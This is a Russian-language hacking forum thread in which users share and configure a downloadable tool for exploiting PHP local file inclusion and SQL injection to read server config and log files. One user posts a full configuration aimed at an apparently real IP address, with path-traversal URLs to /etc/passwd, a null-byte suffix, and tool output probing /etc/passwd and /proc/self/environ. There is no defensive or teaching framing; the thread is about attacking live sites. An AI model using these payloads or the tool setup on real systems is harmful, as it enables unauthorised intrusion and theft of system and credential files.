Когда используют багу Php include, то нередко ищут конфигуруционые файлы и логи. Есть список путей к ним. Надо написать срипт который будет перебирать их. Подскажите как это реализовать? и может быть есть готовый?

https://forum.antichat.ru/showthread.php?p=802722

свой юзаю:

Парсер логов, работает в нескольких режимах:

MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)

все настройки задаются в файле phpinj.ini
словарь логов находится в файле logs.txt
запускается при помощи RUN!!!.cmd под WIN или plp.php под LINUX (т.е. исходники в комплекте)

В результате сканирования будут созданы два файла:

1. Имя_хоста_RESULTS.txt - файл с результатами запросов
2. Имя_хоста_URL.txt - файл с прочеканными и выдавшими результат url

В комплекте примеры phpinj.ini для разных режимов работы программы

Скачать (http://bug-track.ru/prog/plp.rar)

Большое Вам спасибо. Pashkela, подскажи плиз как юзать твой скрипт, в какой файлег вбивать урл и т.д.?
ЗЫ

LFI - это и есть локальный инклуд

Жесть, Pashkela все объяснил более чем понятно, а ты переспрашиваешь еще...

Люди добрые, помогите заюзать.
Вот инклуд. http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd

в phpinj.ini вставляю

;=========================================

MODE = 1 ; <= режим сканирования

;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало):
;----------------------------------------------------------------------------------------------------

URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"

;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку (включая окончание, полная ссылка):
;----------------------------------------------------------------------------------------------------

ERROR_URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd1"

;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования:
;----------------------------------------------------------------------------------------------------

URL_END = "%00"

;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
; Если в тексте ошибки есть символы, отличные от букв или цифр - ошибку следует заключить в двойные кавычки.
;----------------------------------------------------------------------------------------------------

ERROR_MESSAGE = Error: ../../../../../../../etc/passwd1 does not exist!

;----------------------------------------------------------------------------------------------------

PAUSE = 0 ; Пауза между запросами


не раб. (((((

точнее оооочень медленно перебераются каталоги (((


C:\WebServers\home\localhost\www\plp>cmd /k plp.exe
/etc/passwd
/proc/self/environ